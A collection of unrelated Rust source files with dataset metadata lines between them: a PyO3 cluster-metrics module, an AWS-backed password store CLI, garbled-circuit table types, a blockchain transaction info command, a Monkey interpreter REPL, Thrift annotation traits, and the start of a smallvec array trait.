use std::fs ; use std::collections::HashMap; use std::collections::HashSet; use std::iter::FromIterator; use std::iter::Iterator; use ndarray::Array2; use rayon; use rayon::prelude::*; use flate2::read::GzDecoder; use std::io::prelude::*; use glob::glob; use pyo3::prelude::*; use pyo3::wrap_pyfunction; #[derive(Debug)] struct ClusterResults { barcodes:Vec<i64>, labels: Vec<i64> , barcode_set:HashSet<i64>, grouped_barcodes: HashMap<i64, HashSet<i64>>, h_tot: f64, exp_name:String } #[pyclass] struct ExperimentResults{ #[pyo3(get)] exp_param :String, #[pyo3(get)] cluster_ids : Vec<i64>, #[pyo3(get)] stability_scores: Vec<f64>, #[pyo3(get)] purity_scores:Vec<f64> } impl ExperimentResults{ fn pprint(&self){ for i in 0..self.cluster_ids.len(){ println!("{},{},{}",&self.cluster_ids[i], &self.stability_scores[i],&self.purity_scores[i] ) } } fn write_csv(&self, outpath:&str)->std::io::Result<()>{ let mut lines: Vec<String> = vec![String::new();self.cluster_ids.len()]; for i in 0..self.cluster_ids.len(){ lines[i] = format!("{},{},{}\n",self.cluster_ids[i], self.stability_scores[i],self.purity_scores[i]) } let outfile = format!("{}/{}", outpath, self.exp_param); let outstring = lines.join(""); fs::write(outfile, outstring).unwrap(); Ok(()) } fn write_csv_simple(&self, outfile:&str)->std::io::Result<()>{ let mut lines: Vec<String> = vec![String::new();self.cluster_ids.len()]; for i in 0..self.cluster_ids.len(){ lines[i] = format!("{},{},{}\n",self.cluster_ids[i], self.stability_scores[i],self.purity_scores[i]) } let outstring = lines.join(""); fs::write(outfile, outstring).unwrap(); Ok(()) } } fn entropy(group_map: &HashMap<i64, HashSet<i64>>, labels:&Vec<i64> ) -> f64{ let n = labels.len() as f64; let res: f64 = group_map.values().map(|i|{ let p = i.len() as f64 /n; p * p.ln() }).sum(); return res * -1 as f64 } impl ClusterResults{ fn new(barcodes:Vec<i64>, labels: Vec<i64>, exp_name: String) -> ClusterResults{ let barcode_set: HashSet<i64> = HashSet::from_iter(barcodes.clone()); let mut grouped_barcodes:HashMap<i64, HashSet<i64>> = HashMap::new(); let mut old_label = &labels[0]; let mut current_label = &labels[0];// declare out here so we can add the last set back in let mut current_set: HashSet<i64> = HashSet::new(); for i in 0..barcodes.len(){ current_label = &labels[i]; let current_barcode = &barcodes[i]; if current_label == old_label{ current_set.insert(current_barcode.clone()); }else{// reach a new cluster let dup_check = grouped_barcodes.insert(old_label.clone(), current_set); if !dup_check.is_none(){ // HashMap.insert returns None when new key is added panic!("A duplicate key was added when making a ClusterResults; input data is not sorted by label") } let ns: HashSet<i64> = HashSet::new(); current_set = ns; current_set.insert(current_barcode.clone()); old_label = current_label; } } grouped_barcodes.insert(current_label.clone(), current_set); let h_tot = entropy(&grouped_barcodes, &labels); ClusterResults{barcodes, labels, barcode_set, grouped_barcodes, h_tot, exp_name} } fn head(&self){ println!("{:?}", &self.barcodes[0..5]); println!("{:?}", &self.labels[0..5]) } } fn stability_k(ref_bc: &HashSet<i64>, query:&ClusterResults) -> f64{ let intersect: HashSet<i64> = ref_bc.intersection(&query.barcode_set).cloned().collect::<HashSet<i64>>(); if intersect.len() == 0{ return 0.0 } else{ let mut new_bc :Vec<i64> = vec![-1; intersect.len()]; let mut new_labels : Vec<i64> = vec![-1; intersect.len()]; let mut j=0; for i in 0..query.barcodes.len(){ if intersect.contains(&query.barcodes[i]){ new_bc[j] = 
query.barcodes[i].clone(); new_labels[j] = query.labels[i].clone(); j+=1; } } let new_clu = ClusterResults::new(new_bc, new_labels, String::new());//use an empty string for these guys, as they get deleted later return entropy(&new_clu.grouped_barcodes, &new_clu.labels); } } fn decode_reader(bytes: Vec<u8>) -> std::io::Result<String> { let mut gz = GzDecoder::new(&bytes[..]); let mut s = String::new(); gz.read_to_string(&mut s)?; Ok(s) } fn read_cluster_results( file: &str) ->ClusterResults { let mut handle = fs::File::open(file).expect("Bad file input"); let mut buffer = Vec::new(); handle.read_to_end(&mut buffer).expect("couldnt read file"); let file_string = decode_reader(buffer).expect("bad gzip"); let file_string: Vec<&str> = file_string.lines().collect(); let mut barcodes: Vec<i64> = vec![-1; file_string.len()]; let mut labels: Vec<i64> = vec![-1; file_string.len()]; for i in 0..file_string.len(){ let line_split : Vec<&str> = file_string[i].split(",").collect(); barcodes[i] = String::from(line_split[0]).parse::<i64>().unwrap(); labels[i] = String::from(line_split[1]).parse::<i64>().unwrap(); } let exp_name = file.split("/").last().unwrap() ; ClusterResults::new(barcodes,labels, String::from(exp_name)) } fn calculate_metrics(ref_cluster:&ClusterResults, query_clusters: &Vec<&ClusterResults>) -> ExperimentResults{ let mut stability_results = Array2::<f64>::zeros(( ref_cluster.grouped_barcodes.len() ,query_clusters.len() )); let mut purity_results = Array2::<f64>::zeros(( ref_cluster.grouped_barcodes.len() ,query_clusters.len() )); for (i, cluster) in ref_cluster.grouped_barcodes.values().enumerate(){ for (j, experiment) in query_clusters.iter().enumerate() { let mut stab = stability_k(&cluster, &experiment) / experiment.h_tot ; if stab.is_nan(){// cant compare a naturally occuring NAN to f64::NAN stab = 1.0; } stability_results[[i, j]]= stab ; purity_results[[i,j]] = purity_k(&cluster, &experiment.grouped_barcodes) } } let stability_scores = stability_results.rows().into_iter().map(|x| 1.0 - x.mean().unwrap()).collect::<Vec<f64>>(); let purity_scores = purity_results.rows().into_iter().map( |x| { let mut v = x.to_vec(); v.retain(|x| *x != f64::NAN); // in purity_k f64::NAN is explicitly returned, so this works. 
Consider changing for conistency return vmean(v) } ).collect::<Vec<f64>>(); let cluster_ids: Vec<i64> = ref_cluster.grouped_barcodes.keys().cloned().collect::<Vec<i64>>() ; let exp_param = ref_cluster.exp_name.clone(); return ExperimentResults{ exp_param,cluster_ids, stability_scores, purity_scores } } fn vmean(v:Vec<f64>) -> f64{ return v.iter().sum::<f64>() / v.len() as f64 } fn purity_k(ref_bc_set: &HashSet<i64>, query_map: &HashMap<i64, HashSet<i64>>) -> f64{ let mut max_overlap = 0; let mut max_overlap_key:i64 = -100000000; for query_key in query_map.keys(){ let q_cluster_set = query_map.get(query_key).unwrap(); let overlap = ref_bc_set.intersection(q_cluster_set).count(); if overlap > max_overlap{ max_overlap = overlap; max_overlap_key = *query_key; } } if max_overlap_key == -100000000{ return f64::NAN; } else{ return max_overlap as f64 / query_map.get(&max_overlap_key).unwrap().len() as f64 } } fn run_pairwise_calculation_threaded(experiment_list:&Vec<&ClusterResults>, nthreads:usize) ->Vec<ExperimentResults>{ let pool = rayon::ThreadPoolBuilder::new().num_threads(nthreads).build().unwrap(); let dummy_array: Vec<usize> = (0..experiment_list.len()).collect(); let res: Vec<ExperimentResults> = pool.install(|| dummy_array.into_par_iter() .map(|i:usize| { let ref_clust = experiment_list[i]; let mut query_clusts = experiment_list.clone(); query_clusts.remove(i); return calculate_metrics(ref_clust, &query_clusts) }) .collect() ); return res } #[pyfunction] fn pairwise_metric_calculation_fromdisk(file_glob: &str, nthreads:usize) -> Vec<ExperimentResults> { let test_clusters_objs:Vec<ClusterResults> = glob(file_glob) .expect("Failed to read glob pattern") .map(|x|{let file = String::from(x.unwrap().to_str().expect("Failed to unwrap filename")); return read_cluster_results(&file)} ) .collect(); if test_clusters_objs.len() == 0{ panic!("The provided glob string did not match any files!!") } let test_cluster_refs: Vec<&ClusterResults> = test_clusters_objs.iter().collect(); let c_res :Vec<ExperimentResults> = run_pairwise_calculation_threaded(&test_cluster_refs, nthreads); return c_res } #[pyfunction] fn pairwise_metric_calculation_frommem(mut cluster_dfs: Vec<HashMap<String, Vec<i64>>>, exp_names:Vec<String>, nthreads:usize) -> Vec<ExperimentResults> { let clusters_objs_owned = cluster_dfs.into_iter().enumerate().map(|(i, mut x)|{ ClusterResults::new(x.remove(&String::from("Barcode")).unwrap(), x.remove(&String::from("labels")).unwrap(), exp_names[i].clone() )}).collect::<Vec<ClusterResults>>(); let clusters_objs_refs: Vec<&ClusterResults> = clusters_objs_owned.iter().collect(); let c_res :Vec<ExperimentResults> = run_pairwise_calculation_threaded(&clusters_objs_refs, nthreads); return c_res } #[pyfunction] fn metric_calculation_fromdf(mut ref_df: HashMap<String, Vec<i64>>, query_dfs:Vec<HashMap<String, Vec<i64>>>, exp_name: String)->ExperimentResults{ let ref_cluster = ClusterResults::new(ref_df.remove(&String::from("Barcode")).unwrap(), ref_df.remove(&String::from("labels")).unwrap(), exp_name); let query_clusters_owned = query_dfs.into_iter().map(|mut x|ClusterResults::new(x.remove(&String::from("Barcode")).unwrap(), x.remove(&String::from("labels")).unwrap(), String::from("perturbation") ) ).collect::<Vec<ClusterResults>>(); let query_clusters_refs = query_clusters_owned.iter().collect::<Vec<&ClusterResults>>(); let res = calculate_metrics(&ref_cluster, &query_clusters_refs); return res } // fn calc_metrics(module: &PyModule) -> PyResult<()> { // 
module.add_function(wrap_pyfunction!(pairwise_metric_calculation_fromdisk, module)?)?; // module.add_function(wrap_pyfunction!(pairwise_metric_calculation_frommem, module)?)?; // module.add_function(wrap_pyfunction!(oneway_metric_calculation, module)?)?; // module.add_class::<ExperimentResults>()?; // Ok(()) // } #[pymodule] fn _calc_metrics(py: Python, module: &PyModule) -> PyResult<()> { module.add_function(wrap_pyfunction!(pairwise_metric_calculation_fromdisk, module)?)?; module.add_function(wrap_pyfunction!(pairwise_metric_calculation_frommem, module)?)?; module.add_function(wrap_pyfunction!(metric_calculation_fromdf, module)?)?; module.add_class::<ExperimentResults>()?; Ok(()) } #[test] fn check_reader(){ let obj = read_cluster_results("test_data/exp-0_resolution-0.4_knn-15_.csv.gz"); assert_eq!(obj.barcodes.len(), obj.labels.len()); }
true
f4945730d829c877ed9e66b05b378e251d4b199a
Rust
geofflittle/aws-pass
/src/store/default_pass_store.rs
UTF-8
5,894
2.703125
3
[]
no_license
use super::pass_store::PassStore; use crate::{ creds::StsLocalMfaCredsProvider, dao::{ pass_dao::Tag, pass_dao::{Filter, PassDao, Password}, sm_pass_dao::SmPassDao, }, util, }; use anyhow::Result; use async_trait::async_trait; use rusoto_core::Region; use std::fs; use std::{path::PathBuf, process}; use util::write_lines; const CREDENTIALS_FILENAME: &str = ".credentials"; const TOKEN_SERIAL_FILENAME: &str = ".token-serial"; // TODO: Fix tags const STORE_TAGS: (&str, &str) = ("aws-pass", "true"); const STORE_FILTERS: [(&str, [&str; 1]); 2] = [("tag-key", ["aws-pass"]), ("tag-value", ["true"])]; struct StoreDetails { access_key_id: String, secret_access_key: String, token_serial: String, } pub struct DefaultPassStore { store_dir: PathBuf, pass_dao: Box<dyn PassDao + Send + Sync>, } impl DefaultPassStore { pub fn new(store_dir: PathBuf, region: &Region) -> Box<dyn PassStore> { let creds_provider = StsLocalMfaCredsProvider::new( store_dir.join(CREDENTIALS_FILENAME), store_dir.join(TOKEN_SERIAL_FILENAME), region, ); Box::new(DefaultPassStore { store_dir, pass_dao: Box::new(SmPassDao::new(creds_provider, region)), }) } fn ensure_empty_store_dir(&self) { if self.store_dir.exists() && self.store_dir.is_dir() && self.store_dir.read_dir().unwrap().next().is_some() { fatal_println!("Store dir {} not empty, not overwriting", self.store_dir.display()) } if self.store_dir.exists() && self.store_dir.is_file() { fatal_println!("Store dir {} not a directory", self.store_dir.display()) } if !self.store_dir.exists() { println!("Creating store dir at {}", self.store_dir.display()); fs::create_dir(&self.store_dir).unwrap(); } } fn get_store_details(&self) -> StoreDetails { let access_key_id = util::prompt_non_empty_str("AWS Access Key Id"); let secret_access_key = util::prompt_non_empty_str("AWS Secret Access Key"); let token_serial = util::prompt_non_empty_str("MFA Token Serial Number"); StoreDetails { access_key_id, secret_access_key, token_serial, } } fn write_store_details( &self, StoreDetails { access_key_id, secret_access_key, token_serial, }: &StoreDetails, ) { let creds_path = self.store_dir.join(CREDENTIALS_FILENAME); write_lines( &creds_path, vec![ "[default]\n", format!("aws_access_key_id={}\n", access_key_id).as_ref(), format!("aws_secret_access_key={}\n", secret_access_key).as_ref(), ], ); let token_serial_path = self.store_dir.join(TOKEN_SERIAL_FILENAME); write_lines(&token_serial_path, vec![token_serial.as_ref()]); } async fn get_password_by_name(&self, name: &str) -> Result<Password> { let filters: Vec<Filter> = STORE_FILTERS .iter() .map(|f| (f.0.to_string(), f.1.iter().map(|s| s.to_string()).collect())) .collect(); self.pass_dao.get_password_by_name(name, Some(&filters)).await } } #[async_trait] impl PassStore for DefaultPassStore { async fn init(&self) { self.ensure_empty_store_dir(); println!( "Please provide AWS credentials for a user with an associated policy with MFA-protected SecretsManager \ permissions" ); let creds = self.get_store_details(); self.write_store_details(&creds); } async fn list(&self, prefix: Option<&str>) { let ssfilters = STORE_FILTERS .iter() .map(|f| (f.0.to_string(), f.1.iter().map(|s| s.to_string()).collect())) .collect(); let filters: Vec<Filter> = [ ssfilters, prefix .map(|p| vec![("name".to_string(), vec![p.to_string()])]) .unwrap_or_default(), ] .concat(); let passwords = self.pass_dao.list_passwords(&filters).await.unwrap(); let names: Vec<String> = passwords.into_iter().map(|p| p.name).collect(); println!("{}", names.join("\n")); } async fn show(&self, name: 
&str) { let password = self.get_password_by_name(name).await.unwrap(); println!("{}", password.value); } async fn insert(&self, name: &str) { let value = util::prompt_stdin_line("Enter password:"); let tags: Vec<Tag> = vec![(STORE_TAGS.0.to_string(), STORE_TAGS.1.to_string())]; self.pass_dao.create_password(name, &value, Some(&tags)).await.unwrap(); } async fn edit(&self, name: &str) { let password = self.get_password_by_name(name).await.unwrap(); let updated_password = edit::edit(password.value).unwrap().trim_end().to_string(); self.pass_dao .update_password(&password.id, &updated_password) .await .unwrap(); } async fn generate(&self, name: &str, exclude_chars: Option<&str>, length: Option<&i64>) { let tags: Vec<Tag> = vec![(STORE_TAGS.0.to_string(), STORE_TAGS.1.to_string())]; let password = self .pass_dao .create_random_password(name, exclude_chars, length, Some(&tags)) .await .unwrap(); println!("{}", password.value); } async fn remove(&self, name: &str) { let filters: Vec<Filter> = STORE_FILTERS .iter() .map(|f| (f.0.to_string(), f.1.iter().map(|s| s.to_string()).collect())) .collect(); self.pass_dao .delete_password_by_name(name, Some(&filters)) .await .unwrap(); } }
true
c9bc5ffa1609a3616106a56340f07f63e080cf45
Rust
ZenGo-X/pps-gc
/pps-garbled-circuits/src/plain.rs
UTF-8
3,309
3.09375
3
[ "MIT" ]
permissive
use std::{iter, ops};

use anyhow::{ensure, Result};
use rand::Rng;

use super::byte_array::ByteArray;
use super::consts::{INDEX_BYTES, LOCATION_BYTES};

#[derive(Copy, Clone, Debug, PartialEq)]
pub struct TableSize {
    pub m: usize,
    pub l: usize,
}

// todo: remove const generic
#[derive(PartialEq, Debug, Clone)]
pub struct LocationTable {
    receivers: Box<[ByteArray<LOCATION_BYTES>]>,
    size: TableSize,
}

impl LocationTable {
    pub fn new(table: Box<[ByteArray<LOCATION_BYTES>]>, size: TableSize) -> Result<Self> {
        ensure!(
            table.len() == size.m * size.l,
            "table len={}, expected=m*l={}",
            table.len(),
            size.m * size.l
        );
        Ok(Self {
            receivers: table,
            size,
        })
    }

    pub fn random<R: Rng>(rng: &mut R, size: TableSize) -> Result<Self> {
        ensure!(size.m > 0, "m must be non-zero");
        ensure!(size.l > 0, "l must be non-zero");
        let gen_loc = || {
            let mut random_loc = [0u8; LOCATION_BYTES];
            random_loc.iter_mut().for_each(|b| *b = rng.gen());
            ByteArray::new(random_loc)
        };
        Ok(Self {
            receivers: iter::repeat_with(gen_loc)
                .take(size.m * size.l)
                .collect::<Vec<_>>()
                .into_boxed_slice(),
            size,
        })
    }

    pub fn rows(&self) -> impl Iterator<Item = &[ByteArray<LOCATION_BYTES>]> {
        self.receivers.chunks_exact(self.size.l)
    }

    pub fn size(&self) -> TableSize {
        self.size
    }
}

impl ops::Index<u16> for LocationTable {
    type Output = [ByteArray<LOCATION_BYTES>];

    fn index(&self, receiver: u16) -> &Self::Output {
        let receiver = usize::from(receiver);
        &self.receivers[self.size.l * receiver..self.size.l * (receiver + 1)]
    }
}

#[derive(Clone)]
pub struct IndexColumn {
    column: Box<[ByteArray<INDEX_BYTES>]>,
    m: usize,
}

impl IndexColumn {
    pub fn new(column: Box<[ByteArray<INDEX_BYTES>]>, m: usize) -> Result<Self> {
        ensure!(column.len() == m, "column size doesn't match m");
        Ok(Self { column, m })
    }

    pub fn random<R: Rng>(rng: &mut R, m: usize) -> Result<Self> {
        let column: Vec<_> = iter::repeat_with(|| rng.gen::<u16>())
            .map(|x| x.to_be_bytes().into())
            .take(m)
            .collect();
        Ok(Self {
            column: column.into_boxed_slice(),
            m,
        })
    }

    pub fn receivers(&self) -> impl Iterator<Item = &ByteArray<INDEX_BYTES>> {
        self.column.iter()
    }

    pub fn size(&self) -> usize {
        self.column.len()
    }
}

impl ops::Index<u16> for IndexColumn {
    type Output = ByteArray<INDEX_BYTES>;

    fn index(&self, receiver: u16) -> &Self::Output {
        &self.column[usize::from(receiver)]
    }
}

#[cfg(test)]
mod tests {
    use rand::rngs::StdRng;
    use rand::SeedableRng;

    use super::*;

    #[test]
    fn same_seed_produces_same_table() {
        let rng = StdRng::seed_from_u64(1234);
        let params = TableSize { m: 3, l: 4 };
        let table1 = LocationTable::random(&mut rng.clone(), params).unwrap();
        let table2 = LocationTable::random(&mut rng.clone(), params).unwrap();
        assert_eq!(table1, table2);
    }
}
true
5887d143ff1315b0f43f02f770b58cc2bbcb8864
Rust
Guo-astro/pt2itp
/native/src/classify/mod.rs
UTF-8
7,222
2.515625
3
[ "BSD-3-Clause", "BSD-2-Clause" ]
permissive
use postgres::{Connection, TlsMode}; use std::{ collections::HashMap, convert::From, fs::File, io::{BufWriter, Write}, }; use neon::prelude::*; use crate::{ pg, pg::{InputTable, Table}, stream::{AddrStream, GeoStream, PolyStream}, Tokens, }; #[derive(Serialize, Deserialize, Debug)] struct ClassifyArgs { db: String, hecate: Option<bool>, buildings: Option<String>, parcels: Option<String>, input: Option<String>, output: Option<String>, } impl ClassifyArgs { pub fn new() -> Self { ClassifyArgs { db: String::from("classify"), hecate: None, buildings: None, parcels: None, input: None, output: None, } } } pub fn classify(mut cx: FunctionContext) -> JsResult<JsBoolean> { let args: ClassifyArgs = match cx.argument_opt(0) { None => ClassifyArgs::new(), Some(arg) => { if arg.is_a::<JsUndefined>() || arg.is_a::<JsNull>() { ClassifyArgs::new() } else { let arg_val = cx.argument::<JsValue>(0)?; neon_serde::from_value(&mut cx, arg_val)? } } }; let is_hecate = args.hecate.unwrap_or(false); let mut output = match args.output { None => panic!("Output file required"), Some(output) => match File::create(output) { Ok(outfile) => BufWriter::new(outfile), Err(err) => panic!("Unable to write to output file: {}", err), }, }; let conn = Connection::connect( format!("postgres://postgres@localhost:5432/{}", &args.db).as_str(), TlsMode::None, ) .unwrap(); let address = pg::Address::new(); address.create(&conn); address.input( &conn, AddrStream::new( GeoStream::new(args.input), crate::Context::new( String::from("xx"), None, Tokens::new(HashMap::new(), HashMap::new(), HashMap::new()), ), None, ), ); println!("ok - imported addresses"); if !is_hecate { // Hecate Addresses will already have ids present // If not hecate, create sequential ids for processing address.seq_id(&conn); println!("ok - generated seq id for addresses"); } address.index(&conn); let buildings = pg::Polygon::new(String::from("buildings")); buildings.create(&conn); match args.buildings { Some(buildings_in) => { buildings.input( &conn, PolyStream::new(GeoStream::new(Some(buildings_in)), None), ); buildings.index(&conn); println!("ok - imported buildings"); } None => (), }; let parcels = pg::Polygon::new(String::from("parcels")); parcels.create(&conn); match args.parcels { Some(parcels_in) => { parcels.input( &conn, PolyStream::new(GeoStream::new(Some(parcels_in)), None), ); parcels.index(&conn); println!("ok - imported parcels"); } None => (), }; conn.execute( " ALTER TABLE address ADD COLUMN accuracy TEXT ", &[], ) .unwrap(); conn.execute( " UPDATE address SET accuracy = 'rooftop' FROM buildings WHERE ST_Intersects(address.geom, buildings.geom) ", &[], ) .unwrap(); println!("ok - calculated accuracy: building"); conn.execute( " ALTER TABLE parcels ADD COLUMN centroid GEOMETRY(POINT, 4326) ", &[], ) .unwrap(); conn.execute( " UPDATE parcels SET centroid = ST_PointOnSurface(parcels.geom) ", &[], ) .unwrap(); println!("ok - calculated parcel centroids"); conn.execute( " UPDATE address SET accuracy = 'parcel' FROM parcels WHERE accuracy IS NULL AND ST_DWithin(address.geom, parcels.centroid, 0.0001) ", &[], ) .unwrap(); println!("ok - calculated accuracy: parcel"); conn.execute( " UPDATE address SET accuracy = 'point' WHERE accuracy IS NULL ", &[], ) .unwrap(); println!("ok - calculated accuracy: point"); let modified = match is_hecate { true => { conn.execute( r#" UPDATE address SET accuracy = NULL WHERE accuracy = props->>'accuracy' "#, &[], ) .unwrap(); conn.execute( r#" UPDATE address SET props = props::JSONB || JSON_Build_Object('accuracy', 
accuracy)::JSONB WHERE accuracy IS NOT NULL "#, &[], ) .unwrap(); println!("ok - outputting hecate addresses"); pg::Cursor::new( conn, format!( r#" SELECT JSON_Build_Object( 'id', id, 'type', 'Feature', 'action', 'modify', 'version', version, 'properties', props, 'geometry', ST_AsGeoJSON(ST_Force2D(geom))::JSON ) FROM address WHERE accuracy IS NOT NULL "# ), ) .unwrap() } false => { conn.execute( r#" UPDATE address SET props = props::JSONB || JSON_Build_Object('accuracy', accuracy)::JSONB "#, &[], ) .unwrap(); println!("ok - outputting addresses"); pg::Cursor::new( conn, format!( r#" SELECT JSON_Build_Object( 'id', id, 'type', 'Feature', 'properties', props, 'geometry', ST_AsGeoJSON(ST_Force2D(geom))::JSON ) FROM address "# ), ) .unwrap() } }; for feat in modified { let feat = format!("{}\n", feat.to_string()); if output.write(feat.as_bytes()).is_err() { panic!("Failed to write to output stream"); } } if output.flush().is_err() { panic!("Failed to flush output stream"); } Ok(cx.boolean(true)) }
true
40c2a2930d96faad28200d205e950edfe6672d40
Rust
input-output-hk/jormungandr
/jcli/src/jcli_lib/transaction/info.rs
UTF-8
3,506
2.515625
3
[ "MIT", "Apache-2.0" ]
permissive
use crate::jcli_lib::{
    transaction::{common, Error},
    utils::{io, OutputFormat},
};
use chain_addr::AddressReadable;
use chain_impl_mockchain::transaction::{Balance, UnspecifiedAccountIdentifier};
use jormungandr_lib::{crypto::hash::Hash, interfaces::TransactionInputType};
use serde_json::json;
use std::{io::Write, path::PathBuf};
use structopt::StructOpt;

#[derive(StructOpt)]
#[structopt(rename_all = "kebab-case")]
pub struct Info {
    #[structopt(flatten)]
    common: common::CommonTransaction,

    #[structopt(flatten)]
    fee: common::CommonFees,

    /// write the info in the given file or print it to the standard output
    #[structopt(long = "output")]
    output: Option<PathBuf>,

    #[structopt(flatten)]
    output_format: OutputFormat,

    /// set the address prefix to use when displaying the addresses
    #[structopt(long = "prefix", default_value = "ca")]
    address_prefix: String,
}

impl Info {
    pub fn exec(self) -> Result<(), Error> {
        let staging = self.common.load()?;

        let inputs = staging
            .inputs()
            .iter()
            .map(|input| match input.input {
                TransactionInputType::Utxo(utxo_ptr, index) => Ok(json!({
                    "kind": "utxo",
                    "value": input.value,
                    "txid": Hash::from(utxo_ptr),
                    "index": index,
                })),
                TransactionInputType::Account(account) => {
                    let account_id = UnspecifiedAccountIdentifier::from(account)
                        .to_single_account()
                        .ok_or(Error::InfoExpectedSingleAccount)?;
                    Ok(json!({
                        "kind": "account",
                        "value": input.value,
                        "account": account_id.to_string(),
                    }))
                }
            })
            .collect::<Result<Vec<_>, Error>>()?;

        let outputs = staging.outputs().iter().map(|output| {
            json!({
                "address": AddressReadable::from_address(&self.address_prefix, output.address().as_ref()).to_string(),
                "value": output.value(),
            })
        }).collect::<Vec<_>>();

        let fee_algo = self.fee.linear_fee();

        let balance = match staging.balance(&fee_algo)? {
            Balance::Negative(value) | Balance::Positive(value) => value.0,
            Balance::Zero => 0,
        };

        let info = json!({
            "status": staging.staging_kind_name(),
            "sign_data_hash": staging.transaction_sign_data_hash()?.to_string(),
            "num_inputs": staging.inputs().len(),
            "num_outputs": staging.outputs().len(),
            "num_witnesses": staging.witness_count(),
            "input": staging.total_input()?.0,
            "output": staging.total_output()?.0,
            "fee": staging.fees(&fee_algo).0,
            "balance": balance,
            "inputs": inputs,
            "outputs": outputs,
        });

        let mut output =
            io::open_file_write(&self.output).map_err(|source| Error::InfoFileWriteFailed {
                source,
                path: self.output.clone().unwrap_or_default(),
            })?;

        writeln!(output, "{}", self.output_format.format_json(info)?).map_err(|source| {
            Error::InfoFileWriteFailed {
                source,
                path: self.output.clone().unwrap_or_default(),
            }
        })?;

        Ok(())
    }
}
true
229b0fb1df16c43d8bb93030c9e2f76a0ef57830
Rust
jannikkeye/monkey-rust
/interpreter/src/repl.rs
UTF-8
1,366
2.875
3
[]
no_license
use crate::evaluator;
use crate::lexer;
use crate::object::Object;
use crate::parser;
use std::io::{stdin, stdout, Write};

const PROMPT: &str = ">> ";

pub fn start() {
    println!(
        "
    WELCOME TO THE MONKEY PROGRAMMING LANGUAGE!
    HAVE FUN, HUMAN!
    "
    );

    let mut evaluator = evaluator::Evaluator::new();

    loop {
        let mut input = String::new();

        print!("{}", PROMPT);
        stdout().flush().expect("Error flushing stdout");

        stdin()
            .read_line(&mut input)
            .expect("Error reading from STDIN");

        let lexer = lexer::Lexer::new(&input);
        let mut parser = parser::Parser::new(lexer);
        let program = parser.parse_program().expect("parsing failed");

        if !parser.errors.is_empty() {
            println!("Whoops! We ran into some monkey business here!");
            println!("parse errors:");

            for e in parser.errors.iter() {
                println!("\t{}", e);
            }

            continue;
        }

        let evaluated = evaluator.eval(program);

        if let Some(eval) = evaluated {
            if let Object::Error(_) = &eval {
                println!("Whoops! We ran into some monkey business here!");
                println!("evaluation error:");
            }

            println!("{}", eval);
            println!("\n");
        }
    }
}
true
e69fedec3021e886fa624ab70ca863f8fec9244d
Rust
facebook/fbthrift
/thrift/lib/rust/src/metadata.rs
UTF-8
2,843
2.953125
3
[ "Apache-2.0" ]
permissive
/*
 * Copyright (c) Meta Platforms, Inc. and affiliates.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

pub trait ThriftAnnotations: 'static {
    /// Returns the structured annotation `T` that is defined on this Thrift type, if the
    /// annotation exists.
    fn get_structured_annotation<T: Sized + 'static>() -> Option<T> {
        None
    }

    /// Returns the structured annotation `T` that is defined on the given field with id `field_id`
    /// on this Thrift type.
    ///
    /// Returns `None` if the field ID does not exist or if the given `T` does not exist as an
    /// annotation on the given field.
    ///
    /// For example, for the given Thrift file:
    /// ```thrift
    /// struct FieldAnnotation {
    ///   1: string payload;
    /// }
    ///
    /// struct Foo {
    ///   @FieldAnnotation{ payload = "hello world" }
    ///   1: string username;
    /// }
    /// ```
    ///
    /// The call
    /// ```ignore
    /// <Foo as ThriftAnnotations>::get_field_structured_annotation::<FieldAnnotation>(1)
    /// ```
    /// will return
    /// ```ignore
    /// Some(FieldAnnotation {
    ///     payload: "hello world".to_string(),
    /// })
    /// ```
    fn get_field_structured_annotation<T: Sized + 'static>(_field_id: i16) -> Option<T> {
        None
    }
}

/// Identical to [ThriftAnnotations] but is implemented on the unit type (), for which
/// `get_structured_annotation` and `get_field_structured_annotation` will always return `None`.
///
/// This allows a method to take `<T: MaybeThriftAnnotations>` to express the logic of "give me a
/// privacy aware Thrift struct OR a 'void' type to indicate no type".
pub trait MaybeThriftAnnotations: 'static {
    fn get_structured_annotation<T: Sized + 'static>() -> Option<T> {
        None
    }

    fn get_field_structured_annotation<T: Sized + 'static>(_field_id: i16) -> Option<T> {
        None
    }
}

impl<S: ThriftAnnotations> MaybeThriftAnnotations for S {
    fn get_structured_annotation<T: Sized + 'static>() -> Option<T> {
        <S as ThriftAnnotations>::get_structured_annotation::<T>()
    }

    fn get_field_structured_annotation<T: Sized + 'static>(field_id: i16) -> Option<T> {
        <S as ThriftAnnotations>::get_field_structured_annotation::<T>(field_id)
    }
}

impl MaybeThriftAnnotations for () {}
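// A minimal usage sketch (not part of the original file). `MyGeneratedStruct` is a hypothetical
// stand-in for a codegen'd Thrift struct; with no overridden methods, every lookup falls back to
// the `None` defaults defined above, and the blanket impl carries it into `MaybeThriftAnnotations`.
#[cfg(test)]
mod annotation_defaults_sketch {
    use super::*;

    struct MyGeneratedStruct;
    impl ThriftAnnotations for MyGeneratedStruct {}

    #[test]
    fn defaults_return_none() {
        // Falls back to the default trait methods, so both lookups yield None.
        assert!(
            <MyGeneratedStruct as MaybeThriftAnnotations>::get_structured_annotation::<String>()
                .is_none()
        );
        assert!(<() as MaybeThriftAnnotations>::get_field_structured_annotation::<String>(1).is_none());
    }
}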
true
297cc6a5589b2361446912ceee84aa7dd97d1f20
Rust
c410-f3r/rust-smallvec
/src/array.rs
UTF-8
1,048
3.578125
4
[ "MIT", "Apache-2.0" ]
permissive
/// Types that can be used as the backing store for a SmallVec
pub unsafe trait Array {
    /// The type of the array's elements.
    type Item;

    /// Returns a mutable pointer to the first element of the array.
    fn as_mut_ptr(&mut self) -> *mut Self::Item;

    /// Returns a pointer to the first element of the array.
    fn as_ptr(&self) -> *const Self::Item;

    /// Returns the number of items the array can hold.
    fn size() -> usize;
}

macro_rules! impl_array(
    ($($size:expr),+) => {
        $(
            unsafe impl<T> Array for [T; $size] {
                type Item = T;

                fn as_mut_ptr(&mut self) -> *mut T {
                    self.as_mut().as_mut_ptr()
                }

                fn as_ptr(&self) -> *const T {
                    self.as_ref().as_ptr()
                }

                fn size() -> usize {
                    $size
                }
            }
        )+
    }
);

impl_array!(
